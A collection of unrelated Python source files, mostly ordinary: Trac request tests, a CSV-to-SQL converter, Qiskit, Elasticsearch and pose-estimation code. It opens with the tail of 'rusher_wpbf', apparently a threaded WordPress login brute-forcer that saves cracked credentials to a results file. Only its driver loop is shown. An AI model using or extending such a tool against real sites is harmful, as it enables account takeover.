executor.submit(self.execution, target, self.args.thread)
else:
print("[-] [Error] -> ( Not found {} )".format(self.args.wordlist))
else:
if os.path.isfile(self.args.wordlist):
print("[*] [Bruteforcing]")
self.target = 1
self.execution(self.args.target, self.args.thread)
else:
print("[-] [Error] -> ( Not found {} )".format(self.args.wordlist))
print("\n")
if self.result > 0:
print("[+] [View Result: result-wp/success.txt]")
print("\n")
for x in open("result-wp/success.txt").read().splitlines():
print("[+] [{}]".format(x))
else:
print("[-] [No Result]")
print("\n")
print("[*] [Done]")
if __name__ == "__main__":
rusher_wpbf()
| StarcoderdataPython |
1612929 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2015 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os.path
import shutil
import sys
import tempfile
import unittest
from StringIO import StringIO
import trac.tests.compat
from genshi.builder import tag
from trac import perm
from trac.core import TracError
from trac.test import EnvironmentStub, Mock, MockPerm, locale_en
from trac.util import create_file
from trac.util.datefmt import utc
from trac.util.text import shorten_line
from trac.web.api import HTTPBadRequest, HTTPInternalError, Request, \
RequestDone, parse_arg_list
from tracopt.perm.authz_policy import AuthzPolicy
class RequestHandlerPermissionsTestCaseBase(unittest.TestCase):
authz_policy = None
def setUp(self, module_class):
self.path = tempfile.mkdtemp(prefix='trac-')
if self.authz_policy is not None:
self.authz_file = os.path.join(self.path, 'authz_policy.conf')
create_file(self.authz_file, self.authz_policy)
self.env = EnvironmentStub(enable=['trac.*', AuthzPolicy],
path=self.path)
self.env.config.set('authz_policy', 'authz_file', self.authz_file)
self.env.config.set('trac', 'permission_policies',
'AuthzPolicy, DefaultPermissionPolicy')
else:
self.env = EnvironmentStub(path=self.path)
self.req_handler = module_class(self.env)
def tearDown(self):
self.env.reset_db()
shutil.rmtree(self.path)
def create_request(self, authname='anonymous', **kwargs):
kw = {'perm': perm.PermissionCache(self.env, authname), 'args': {},
'href': self.env.href, 'abs_href': self.env.abs_href,
'tz': utc, 'locale': None, 'lc_time': locale_en,
'session': Mock(get=lambda k, d=None: d,
set=lambda k, v, d=None: None),
'authname': authname, 'chrome': {'notices': [], 'warnings': []},
'method': None, 'get_header': lambda v: None, 'is_xhr': False}
kw.update(kwargs)
return Mock(**kw)
def get_navigation_items(self, req):
return self.req_handler.get_navigation_items(req)
def grant_perm(self, username, *actions):
permsys = perm.PermissionSystem(self.env)
for action in actions:
permsys.grant_permission(username, action)
def process_request(self, req):
self.assertTrue(self.req_handler.match_request(req))
return self.req_handler.process_request(req)
def _make_environ(scheme='http', server_name='example.org',
server_port=80, method='GET', script_name='/trac',
**kwargs):
environ = {'wsgi.url_scheme': scheme, 'wsgi.input': StringIO(''),
'REQUEST_METHOD': method, 'SERVER_NAME': server_name,
'SERVER_PORT': server_port, 'SCRIPT_NAME': script_name}
environ.update(kwargs)
return environ
def _make_req(environ, start_response, args={}, arg_list=(), authname='admin',
form_token='A' * 40, chrome={'links': {}, 'scripts': []},
perm=MockPerm(), session={}, tz=utc, locale=None, **kwargs):
req = Request(environ, start_response)
req.args = args
req.arg_list = arg_list
req.authname = authname
req.form_token = form_token
req.chrome = chrome
req.perm = perm
req.session = session
req.tz = tz
req.locale = locale
for name, value in kwargs.iteritems():
setattr(req, name, value)
return req
class RequestTestCase(unittest.TestCase):
def _make_environ(self, *args, **kwargs):
return _make_environ(*args, **kwargs)
def test_is_xhr_true(self):
environ = self._make_environ(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
req = Request(environ, None)
self.assertTrue(req.is_xhr)
def test_is_xhr_false(self):
environ = self._make_environ()
req = Request(environ, None)
self.assertFalse(req.is_xhr)
def test_base_url(self):
environ = self._make_environ()
req = Request(environ, None)
self.assertEqual('http://example.org/trac', req.base_url)
def test_base_url_host(self):
environ = self._make_environ(server_port=8080, HTTP_HOST='example.com')
req = Request(environ, None)
self.assertEqual('http://example.com/trac', req.base_url)
def test_base_url_nondefaultport(self):
environ = self._make_environ(server_port=8080)
req = Request(environ, None)
self.assertEqual('http://example.org:8080/trac', req.base_url)
def test_base_url_https(self):
environ = self._make_environ(scheme='https', server_port=443)
req = Request(environ, None)
self.assertEqual('https://example.org/trac', req.base_url)
def test_base_url_https_host(self):
environ = self._make_environ(scheme='https', server_port=443,
HTTP_HOST='example.com')
req = Request(environ, None)
self.assertEqual('https://example.com/trac', req.base_url)
def test_base_url_https_nondefaultport(self):
environ = self._make_environ(scheme='https', server_port=8443)
req = Request(environ, None)
self.assertEqual('https://example.org:8443/trac', req.base_url)
def test_base_url_proxy(self):
environ = self._make_environ(HTTP_HOST='localhost',
HTTP_X_FORWARDED_HOST='example.com')
req = Request(environ, None)
self.assertEqual('http://localhost/trac', req.base_url)
def test_languages(self):
environ = self._make_environ()
environ['HTTP_ACCEPT_LANGUAGE'] = 'en-us,en;q=0.5'
req = Request(environ, None)
self.assertEqual(['en-us', 'en'], req.languages)
def test_redirect(self):
status_sent = []
headers_sent = {}
def start_response(status, headers):
status_sent.append(status)
headers_sent.update(dict(headers))
environ = self._make_environ(method='HEAD')
req = Request(environ, start_response)
req.session = Mock(save=lambda: None)
self.assertRaises(RequestDone, req.redirect, '/trac/test')
self.assertEqual('302 Found', status_sent[0])
self.assertEqual('http://example.org/trac/test',
headers_sent['Location'])
def test_redirect_absolute(self):
status_sent = []
headers_sent = {}
def start_response(status, headers):
status_sent.append(status)
headers_sent.update(dict(headers))
environ = self._make_environ(method='HEAD')
req = Request(environ, start_response,)
req.session = Mock(save=lambda: None)
self.assertRaises(RequestDone, req.redirect,
'http://example.com/trac/test')
self.assertEqual('302 Found', status_sent[0])
self.assertEqual('http://example.com/trac/test',
headers_sent['Location'])
def test_redirect_with_post_and_hash_for_msie(self):
url = 'http://example.com/trac/ticket/1#comment:2'
msie303 = 'http://example.com/trac/ticket/1#__msie303:comment:2'
def location(ua):
status_sent = []
headers_sent = {}
def start_response(status, headers):
status_sent.append(status)
headers_sent.update(dict(headers))
environ = self._make_environ(method='POST', HTTP_USER_AGENT=ua)
req = Request(environ, start_response,)
req.session = Mock(save=lambda: None)
self.assertRaises(RequestDone, req.redirect, url)
self.assertEqual('303 See Other', status_sent[0])
return headers_sent['Location']
# IE 11 strict mode
self.assertEqual(url, location(
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'))
# IE 11 compatibility view mode
self.assertEqual(url, location(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0)'))
# IE 10 strict mode
self.assertEqual(url, location(
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
))
# IE 10 compatibility view mode
self.assertEqual(url, location(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)'))
# IE 9 strict mode
self.assertEqual(msie303, location(
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'))
# IE 9 compatibility view mode
self.assertEqual(msie303, location(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0)'))
# IE 8 strict mode
self.assertEqual(msie303, location(
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'))
# IE 8 compatibility view mode
self.assertEqual(msie303, location(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)'))
# IE 7
self.assertEqual(msie303, location(
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'))
# IE 6
self.assertEqual(msie303, location(
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'))
def test_write_iterable(self):
buf = StringIO()
def write(data):
buf.write(data)
def start_response(status, headers):
return write
environ = self._make_environ(method='GET')
buf = StringIO()
req = Request(environ, start_response)
req.send_header('Content-Type', 'text/plain;charset=utf-8')
req.write(('Foo', 'bar', 'baz'))
self.assertEqual('Foobarbaz', buf.getvalue())
def test_write_unicode(self):
buf = StringIO()
def write(data):
buf.write(data)
def start_response(status, headers):
return write
environ = self._make_environ(method='HEAD')
req = Request(environ, start_response)
req.send_header('Content-Type', 'text/plain;charset=utf-8')
req.send_header('Content-Length', 0)
# anyway we're not supposed to send unicode, so we get a ValueError
self.assertRaises(ValueError, req.write, u'Föö')
self.assertRaises(ValueError, req.write, ('F', u'öo'))
def test_send_iterable(self):
baton = {'content': StringIO(), 'status': None, 'headers': None}
def write(data):
baton['content'].write(data)
def start_response(status, headers):
baton['status'] = status
baton['headers'] = headers
return write
environ = self._make_environ(method='GET')
def iterable():
yield 'line1,'
yield ''
yield 'line2,'
yield 'line3\n'
req = Request(environ, start_response)
self.assertRaises(RequestDone, req.send, iterable())
self.assertEqual('200 Ok', baton['status'])
self.assertEqual([('Cache-Control', 'must-revalidate'),
('Expires', 'Fri, 01 Jan 1999 00:00:00 GMT'),
('Content-Type', 'text/html;charset=utf-8')],
baton['headers'])
self.assertEqual('line1,line2,line3\n', baton['content'].getvalue())
def test_invalid_cookies(self):
environ = self._make_environ(HTTP_COOKIE='bad:key=value;')
req = Request(environ, None)
self.assertEqual('', str(req.incookie))
def test_multiple_cookies(self):
environ = self._make_environ(HTTP_COOKIE='key=value1; key=value2;')
req = Request(environ, None)
self.assertEqual('Set-Cookie: key=value1',
str(req.incookie).rstrip(';'))
def test_read(self):
environ = self._make_environ(**{'wsgi.input': StringIO('test input')})
req = Request(environ, None)
self.assertEqual('test input', req.read())
def test_read_size(self):
environ = self._make_environ(**{'wsgi.input': StringIO('test input')})
req = Request(environ, None)
self.assertEqual('test', req.read(size=4))
def test_qs_on_post(self):
"""Make sure req.args parsing is consistent even after the backwards
incompatible change introduced in Python 2.6.
"""
environ = self._make_environ(method='GET',
**{'QUERY_STRING': 'action=foo'})
req = Request(environ, None)
self.assertEqual('foo', req.args['action'])
environ = self._make_environ(method='POST',
**{'wsgi.input': StringIO('action=bar'),
'CONTENT_LENGTH': '10',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'QUERY_STRING': 'action=foo'})
req = Request(environ, None)
self.assertEqual('bar', req.args['action'])
def test_qs_invalid_value_bytes(self):
environ = self._make_environ(**{'QUERY_STRING': 'name=%FF'})
req = Request(environ, None)
self.assertRaises(HTTPBadRequest, lambda: req.arg_list)
def test_qs_invalid_name_bytes(self):
environ = self._make_environ(**{'QUERY_STRING': '%FF=value'})
req = Request(environ, None)
self.assertRaises(HTTPBadRequest, lambda: req.arg_list)
class RequestSendFileTestCase(unittest.TestCase):
def setUp(self):
self.status = None
self.headers = None
self.response = StringIO()
self.dir = tempfile.mkdtemp(prefix='trac-')
self.filename = os.path.join(self.dir, 'test.txt')
self.data = 'contents\n'
create_file(self.filename, self.data, 'wb')
self.req = None
def tearDown(self):
if self.req and self.req._response:
self.req._response.close()
shutil.rmtree(self.dir)
def _start_response(self, status, headers):
self.status = status
self.headers = dict(headers)
def write(data):
self.response.write(data)
return write
def _create_req(self, use_xsendfile=False, xsendfile_header='X-Sendfile',
**kwargs):
req = Request(_make_environ(**kwargs), self._start_response)
req.callbacks.update({'use_xsendfile': lambda r: use_xsendfile,
'xsendfile_header': lambda r: xsendfile_header})
self.req = req
return req
def test_send_file(self):
req = self._create_req()
self.assertRaises(RequestDone, req.send_file, self.filename,
'text/plain')
self.assertEqual('200 Ok', self.status)
self.assertEqual('text/plain', self.headers['Content-Type'])
self.assertEqual(str(len(self.data)), self.headers['Content-Length'])
self.assertNotIn('X-Sendfile', self.headers)
self.assertEqual(self.data, ''.join(req._response))
self.assertEqual('', self.response.getvalue())
def test_send_file_with_xsendfile(self):
req = self._create_req(use_xsendfile=True)
self.assertRaises(RequestDone, req.send_file, self.filename,
'text/plain')
self.assertEqual('200 Ok', self.status)
self.assertEqual('text/plain', self.headers['Content-Type'])
self.assertEqual(self.filename, self.headers['X-Sendfile'])
self.assertEqual(None, req._response)
self.assertEqual('', self.response.getvalue())
def test_send_file_with_xsendfile_header(self):
req = self._create_req(use_xsendfile=True,
xsendfile_header='X-Accel-Redirect')
self.assertRaises(RequestDone, req.send_file, self.filename,
'text/plain')
self.assertEqual('200 Ok', self.status)
self.assertEqual('text/plain', self.headers['Content-Type'])
self.assertEqual(self.filename, self.headers['X-Accel-Redirect'])
self.assertNotIn('X-Sendfile', self.headers)
self.assertEqual(None, req._response)
self.assertEqual('', self.response.getvalue())
def test_send_file_with_xsendfile_and_empty_header(self):
req = self._create_req(use_xsendfile=True, xsendfile_header='')
self.assertRaises(RequestDone, req.send_file, self.filename,
'text/plain')
self.assertEqual('200 Ok', self.status)
self.assertEqual('text/plain', self.headers['Content-Type'])
self.assertEqual(str(len(self.data)), self.headers['Content-Length'])
self.assertNotIn('X-Sendfile', self.headers)
self.assertEqual(self.data, ''.join(req._response))
self.assertEqual('', self.response.getvalue())
class SendErrorTestCase(unittest.TestCase):
def setUp(self):
self.env = EnvironmentStub()
def tearDown(self):
self.env.reset_db()
def test_trac_error(self):
content = self._send_error(error_klass=TracError)
self.assertIn('<p class="message">Oops!</p>', content)
self.assertNotIn('<strong>Trac detected an internal error:</strong>',
content)
self.assertNotIn('There was an internal error in Trac.', content)
def test_internal_error_for_non_admin(self):
content = self._send_error(perm={})
self.assertIn('There was an internal error in Trac.', content)
self.assertIn('<p>To that end, you could', content)
self.assertNotIn('This is probably a local installation issue.',
content)
self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)
def test_internal_error_with_admin_trac_for_non_admin(self):
content = self._send_error(perm={},
admin_trac_url='http://example.org/admin')
self.assertIn('There was an internal error in Trac.', content)
self.assertIn('<p>To that end, you could', content)
self.assertIn(' action="http://example.org/admin/newticket#"', content)
self.assertNotIn('This is probably a local installation issue.',
content)
self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)
def test_internal_error_without_admin_trac_for_non_admin(self):
content = self._send_error(perm={}, admin_trac_url='')
self.assertIn('There was an internal error in Trac.', content)
self.assertNotIn('<p>To that end, you could', content)
self.assertNotIn('This is probably a local installation issue.',
content)
self.assertNotIn('<h2>Found a bug in Trac?</h2>', content)
def test_internal_error_for_admin(self):
content = self._send_error()
self.assertNotIn('There was an internal error in Trac.', content)
self.assertIn('This is probably a local installation issue.', content)
self.assertNotIn('a ticket at the admin Trac to report', content)
self.assertIn('<h2>Found a bug in Trac?</h2>', content)
self.assertIn('<p>Otherwise, please', content)
self.assertIn(' action="http://example.org/tracker/newticket"',
content)
def test_internal_error_with_admin_trac_for_admin(self):
content = self._send_error(admin_trac_url='http://example.org/admin')
self.assertNotIn('There was an internal error in Trac.', content)
self.assertIn('This is probably a local installation issue.', content)
self.assertIn('a ticket at the admin Trac to report', content)
self.assertIn(' action="http://example.org/admin/newticket#"', content)
self.assertIn('<h2>Found a bug in Trac?</h2>', content)
self.assertIn('<p>Otherwise, please', content)
self.assertIn(' action="http://example.org/tracker/newticket"',
content)
def test_internal_error_without_admin_trac_for_admin(self):
content = self._send_error(admin_trac_url='')
self.assertNotIn('There was an internal error in Trac.', content)
self.assertIn('This is probably a local installation issue.', content)
self.assertNotIn('a ticket at the admin Trac to report', content)
self.assertIn('<h2>Found a bug in Trac?</h2>', content)
self.assertIn('<p>Otherwise, please', content)
self.assertIn(' action="http://example.org/tracker/newticket"',
content)
def _send_error(self, admin_trac_url='.', perm=None,
error_klass=ValueError):
self.env.config.set('project', 'admin_trac_url', admin_trac_url)
self.assertEquals(admin_trac_url, self.env.project_admin_trac_url)
content = StringIO()
result = {'status': None, 'headers': []}
def write(data):
content.write(data)
def start_response(status, headers, exc_info=None):
result['status'] = status
result['headers'].extend(headers)
return write
environ = _make_environ()
req = _make_req(environ, start_response)
try:
raise error_klass('Oops!')
except:
exc_info = sys.exc_info()
data = {'title': 'Internal Error',
'type': ('internal', 'TracError')[error_klass is TracError],
'message': 'Oops!', 'traceback': None, 'frames': [],
'shorten_line': shorten_line,
'plugins': [], 'faulty_plugins': [],
'tracker': 'http://example.org/tracker', 'tracker_args': {},
'description': '', 'description_en': '',
'get_systeminfo': lambda: ()}
if perm is not None:
data['perm'] = perm
self.assertRaises(RequestDone, req.send_error, exc_info, env=self.env,
data=data)
content = content.getvalue().decode('utf-8')
self.assertIn('<!DOCTYPE ', content)
self.assertEquals('500', result['status'].split()[0])
self.assertIn(('Content-Type', 'text/html;charset=utf-8'),
result['headers'])
return content
class ParseArgListTestCase(unittest.TestCase):
def test_qs_str(self):
args = parse_arg_list('k%C3%A9y=resum%C3%A9&r%C3%A9sum%C3%A9')
self.assertTrue(unicode, type(args[0][0]))
self.assertTrue(unicode, type(args[0][1]))
self.assertEqual(u'kéy', args[0][0])
self.assertEqual(u'resumé', args[0][1])
self.assertTrue(unicode, type(args[1][0]))
self.assertEqual(u'résumé', args[1][0])
def test_qs_str_with_prefix(self):
"""The leading `?` should be stripped from the query string."""
args = parse_arg_list('?k%C3%A9y=resum%C3%A9&r%C3%A9sum%C3%A9')
self.assertTrue(unicode, type(args[0][0]))
self.assertTrue(unicode, type(args[0][1]))
self.assertEqual(u'kéy', args[0][0])
self.assertEqual(u'resumé', args[0][1])
self.assertTrue(unicode, type(args[1][0]))
self.assertEqual(u'résumé', args[1][0])
def test_qs_unicode(self):
args = parse_arg_list(u'ké%3Dy=re%26su=mé&résu%26mé')
self.assertTrue(unicode, type(args[0][0]))
self.assertTrue(unicode, type(args[0][1]))
self.assertEqual(u'ké=y', args[0][0])
self.assertEqual(u're&su=mé', args[0][1])
self.assertTrue(unicode, type(args[1][0]))
self.assertEqual(u'résu&mé', args[1][0])
class HTTPExceptionTestCase(unittest.TestCase):
def test_tracerror_with_string_as_argument(self):
e1 = TracError('the message')
e2 = HTTPInternalError(e1)
self.assertEqual('500 Trac Error (the message)', unicode(e2))
def test_tracerror_with_fragment_as_argument(self):
e1 = TracError(tag(tag.b('the message')))
e2 = HTTPInternalError(e1)
self.assertEqual('500 Trac Error (<b>the message</b>)', unicode(e2))
def test_exception_with_string_as_argument(self):
e1 = Exception('the message')
e2 = HTTPInternalError(e1)
self.assertEqual('500 Internal Server Error (the message)',
unicode(e2))
def test_exception_with_fragment_as_argument(self):
e1 = Exception(tag(tag.b('the message')))
e2 = HTTPInternalError(e1)
self.assertEqual('500 Internal Server Error (<b>the message</b>)',
unicode(e2))
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(RequestTestCase))
suite.addTest(unittest.makeSuite(RequestSendFileTestCase))
suite.addTest(unittest.makeSuite(SendErrorTestCase))
suite.addTest(unittest.makeSuite(ParseArgListTestCase))
suite.addTest(unittest.makeSuite(HTTPExceptionTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| StarcoderdataPython |
22742 | #!/usr/bin/python
import argparse
import csv
import sys
'''
This script takes a CSV file with a mandatory header and a sql tablename and converts the data in the csv file into
an SQL INSERT statement.
'''
def parse_arguments():
# initialize argumentparser and arguments
parser = argparse.ArgumentParser(description='Takes a csv file and a tablename and creates an SQL insert statement')
parser.add_argument('csvFile', type=argparse.FileType('r'), help='The CSV file to be read')
parser.add_argument('-t', '--table', dest='tablename', help='The name of the destination SQL table', required=True)
parser.add_argument('-d', '--delimiter', dest='delimiter', default=',', help='The delimiter used in the CSV')
# parse arguments
args = parser.parse_args()
return args
def main():
# parse arguments
args = parse_arguments()
# Open CSV and start output
with args.csvFile as f:
reader = csv.reader(f, delimiter=args.delimiter, quoting=csv.QUOTE_ALL)
# Create the header row, since we may have to repeat it
header_row = 'INSERT INTO `' + args.tablename + '` ('
first = True
for item in next(reader):
if first:
first = False
else:
header_row+=', '
header_row+= item
header_row+=') VALUES '
# Set a counter, since there can't be more than 1000 inserts at a time
counter = 0
# Loop through the rows...
for row in reader:
if counter % 10 == 0:
if counter != 0:
sys.stdout.write(';\n')
#print(header_row)
sys.stdout.write(header_row)
else:
sys.stdout.write(',')
sys.stdout.write('(')
first = True
# Loop through the items in each row
for item in row:
if first:
first = False
else:
sys.stdout.write(', ')
sys.stdout.write('\'' + item.replace('\'', '\'\'').replace('""', 'NULL').replace('&', '&') + '\'')
#sys.stdout.write(item)
sys.stdout.write(')')
# Increase counter
counter += 1
sys.stdout.write(';')
if __name__ == "__main__":
main()
| StarcoderdataPython |
3219204 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
The Univariate Normal Distribution.
"""
from scipy.stats.distributions import norm
from qiskit.aqua.utils.validation import validate_min
from .univariate_distribution import UnivariateDistribution
class NormalDistribution(UnivariateDistribution):
"""
The Univariate Normal Distribution.
"""
def __init__(self,
num_target_qubits: int,
mu: float = 0,
sigma: float = 1,
low: float = -1,
high: float = 1) -> None:
r"""
Args:
num_target_qubits: number of qubits it acts on,
has a min. value of 1.
mu: expected value of considered normal distribution
sigma: standard deviation of considered normal distribution
low: lower bound, i.e., the value corresponding to \|0...0>
(assuming an equidistant grid)
high: upper bound, i.e., the value corresponding to \|1...1>
(assuming an equidistant grid)
"""
validate_min('num_target_qubits', num_target_qubits, 1)
probabilities, _ = UnivariateDistribution.\
pdf_to_probabilities(
lambda x: norm.pdf(x, mu, sigma), low, high, 2 ** num_target_qubits)
super().__init__(num_target_qubits, probabilities, low, high)
| StarcoderdataPython |
60709 | <gh_stars>10-100
from typing import List
from pydantic import BaseModel
class User(BaseModel):
id:str
username:str
bot:bool
class Ready(BaseModel):
version:str
session_id:str
user: User
shard:list[int] | StarcoderdataPython |
1736901 | import sys
class VendorImporter:
"""
A PEP 302 meta path importer for finding optionally-vendored
or otherwise naturally-installed packages from root_name.
"""
def __init__(self, root_name, vendored_names=(), vendor_pkg=None):
self.root_name = root_name
self.vendored_names = set(vendored_names)
self.vendor_pkg = vendor_pkg or root_name.replace('extern', '_vendor')
@property
def search_path(self):
"""
Search first the vendor package then as a natural package.
"""
yield self.vendor_pkg + '.'
yield ''
def find_module(self, fullname, path=None):
"""
Return self when fullname starts with root_name and the
target module is one vendored through this importer.
"""
root, base, target = fullname.partition(self.root_name + '.')
if root:
return
if not any(map(target.startswith, self.vendored_names)):
return
return self
def load_module(self, fullname):
"""
Iterate over the search path to locate and load fullname.
"""
root, base, target = fullname.partition(self.root_name + '.')
for prefix in self.search_path:
try:
extant = prefix + target
__import__(extant)
mod = sys.modules[extant]
sys.modules[fullname] = mod
# mysterious hack:
# Remove the reference to the extant package/module
# on later Python versions to cause relative imports
# in the vendor package to resolve the same modules
# as those going through this importer.
if sys.version_info > (3, 3):
del sys.modules[extant]
return mod
except ImportError:
pass
else:
raise ImportError(
"The '{target}' package is required; "
"normally this is bundled with this package so if you get "
"this warning, consult the packager of your "
"distribution.".format(**locals())
)
def install(self):
"""
Install this importer into sys.meta_path if not already present.
"""
if self not in sys.meta_path:
sys.meta_path.append(self)
names = 'packaging', 'pyparsing', 'six', 'appdirs'
VendorImporter(__name__, names).install()
| StarcoderdataPython |
1704955 | <reponame>jbeezley/SMQTK
from __future__ import division, print_function
import unittest
import mock
from smqtk.algorithms.nn_index.lsh.functors import \
LshFunctor, get_lsh_functor_impls
class TestLshFunctorImplGetter (unittest.TestCase):
@mock.patch('smqtk.algorithms.nn_index.lsh.functors.plugin.get_plugins')
def test_get_lsh_functor_impls_no_reload(self, m_get_plugins):
get_lsh_functor_impls()
m_get_plugins.assert_called_once()
self.assertEqual(m_get_plugins.call_args[0][0],
'smqtk.algorithms.nn_index.lsh.functors')
self.assertEqual(m_get_plugins.call_args[0][2],
'LSH_FUNCTOR_PATH')
self.assertEqual(m_get_plugins.call_args[0][3],
'LSH_FUNCTOR_CLASS')
self.assertEqual(m_get_plugins.call_args[0][4],
LshFunctor)
self.assertFalse(m_get_plugins.call_args[1]['reload_modules'])
@mock.patch('smqtk.algorithms.nn_index.lsh.functors.plugin.get_plugins')
def test_get_lsh_functor_impls_with_reload(self, m_get_plugins):
get_lsh_functor_impls(True)
m_get_plugins.assert_called_once()
self.assertEqual(m_get_plugins.call_args[0][0],
'smqtk.algorithms.nn_index.lsh.functors')
# m_get_plugins.call_args[0][1] is a path depending on where the python
# code is.
self.assertEqual(m_get_plugins.call_args[0][2],
'LSH_FUNCTOR_PATH')
self.assertEqual(m_get_plugins.call_args[0][3],
'LSH_FUNCTOR_CLASS')
self.assertEqual(m_get_plugins.call_args[0][4],
LshFunctor)
self.assertTrue(m_get_plugins.call_args[1]['reload_modules'])
| StarcoderdataPython |
133675 | '''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
from elasticsearch.helpers import bulk
import boto3
from elasticsearch.exceptions import ElasticsearchException
import config
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
# import Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger.config as config
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger.tweet_utils import \
# get_tweet, id_field, get_tweet_mapping
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
region = 'us-east-2' # e.g. us-west-1
service = 'es'
credentials = boto3.Session().get_credentials()
awsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region,
service, session_token=credentials.token)
index_name = 'twitter'
bulk_chunk_size = config.es_bulk_chunk_size
def create_index(es, index_name, mapping):
print('creating index {}...'.format(index_name))
es.indices.create(index_name, body=mapping)
def load(tweets):
# es = Elasticsearch(host = config.es_host, port = config.es_port)
es = Elasticsearch(
hosts=[{'host': config.es_host, 'port': config.es_port}],
http_auth=awsauth,
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
es_version_number = es.info()['version']['number']
mapping_to_put = get_tweet_mapping(es_version_number)
print(mapping_to_put)
# mapping = {doc_type: tweet_mapping
# }
mapping = {'mappings': mapping_to_put}
if es.indices.exists(index_name):
print('index {} already exists'.format(index_name))
try:
es.indices.put_mapping(body=mapping_to_put, index=index_name)
except ElasticsearchException as e:
print('error putting mapping:\n' + str(e))
print('deleting index {}...'.format(index_name))
es.indices.delete(index_name)
create_index(es, index_name, mapping)
else:
print('index {} does not exist'.format(index_name))
create_index(es, index_name, mapping)
counter = 0
bulk_data = []
list_size = len(tweets)
for doc in tweets:
tweet = get_tweet(doc)
bulk_doc = {
"_index": index_name,
# "_type": doc_type,
"_id": tweet[id_field],
"_source": tweet
}
bulk_data.append(bulk_doc)
counter += 1
if counter % bulk_chunk_size == 0 or counter == list_size:
print("ElasticSearch bulk index (index: {INDEX})...".format(
INDEX=index_name))
success, _ = bulk(es, bulk_data)
print('ElasticSearch indexed %d documents' % success)
bulk_data = []
| StarcoderdataPython |
70598 | # ------------------------------------------------------------------------------
# Modified from https://github.com/microsoft/human-pose-estimation.pytorch
# ------------------------------------------------------------------------------
import torch.nn as nn
from ..resnet import _resnet, Bottleneck
class Upsampling(nn.Sequential):
"""
3-layers deconvolution used in `Simple Baseline <https://arxiv.org/abs/1804.06208>`_.
"""
def __init__(self, in_channel=2048, hidden_dims=(256, 256, 256), kernel_sizes=(4, 4, 4), bias=False):
assert len(hidden_dims) == len(kernel_sizes), \
'ERROR: len(hidden_dims) is different len(kernel_sizes)'
layers = []
for hidden_dim, kernel_size in zip(hidden_dims, kernel_sizes):
if kernel_size == 4:
padding = 1
output_padding = 0
elif kernel_size == 3:
padding = 1
output_padding = 1
elif kernel_size == 2:
padding = 0
output_padding = 0
else:
raise NotImplementedError("kernel_size is {}".format(kernel_size))
layers.append(
nn.ConvTranspose2d(
in_channels=in_channel,
out_channels=hidden_dim,
kernel_size=kernel_size,
stride=2,
padding=padding,
output_padding=output_padding,
bias=bias))
layers.append(nn.BatchNorm2d(hidden_dim))
layers.append(nn.ReLU(inplace=True))
in_channel = hidden_dim
super(Upsampling, self).__init__(*layers)
# init following Simple Baseline
for name, m in self.named_modules():
if isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, std=0.001)
if bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
class PoseResNet(nn.Module):
"""
`Simple Baseline <https://arxiv.org/abs/1804.06208>`_ for keypoint detection.
Args:
backbone (torch.nn.Module): Backbone to extract 2-d features from data
upsampling (torch.nn.Module): Layer to upsample image feature to heatmap size
feature_dim (int): The dimension of the features from upsampling layer.
num_keypoints (int): Number of keypoints
finetune (bool, optional): Whether use 10x smaller learning rate in the backbone. Default: False
"""
def __init__(self, backbone, upsampling, feature_dim, num_keypoints, finetune=False):
super(PoseResNet, self).__init__()
self.backbone = backbone
self.upsampling = upsampling
self.head = nn.Conv2d(in_channels=feature_dim, out_channels=num_keypoints, kernel_size=1, stride=1, padding=0)
self.finetune = finetune
for m in self.head.modules():
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.backbone(x)
x = self.upsampling(x)
x = self.head(x)
return x
def get_parameters(self, lr=1.):
return [
{'params': self.backbone.parameters(), 'lr': 0.1 * lr if self.finetune else lr},
{'params': self.upsampling.parameters(), 'lr': lr},
{'params': self.head.parameters(), 'lr': lr},
]
def _pose_resnet(arch, num_keypoints, block, layers, pretrained_backbone, deconv_with_bias, finetune=False, progress=True, **kwargs):
backbone = _resnet(arch, block, layers, pretrained_backbone, progress, **kwargs)
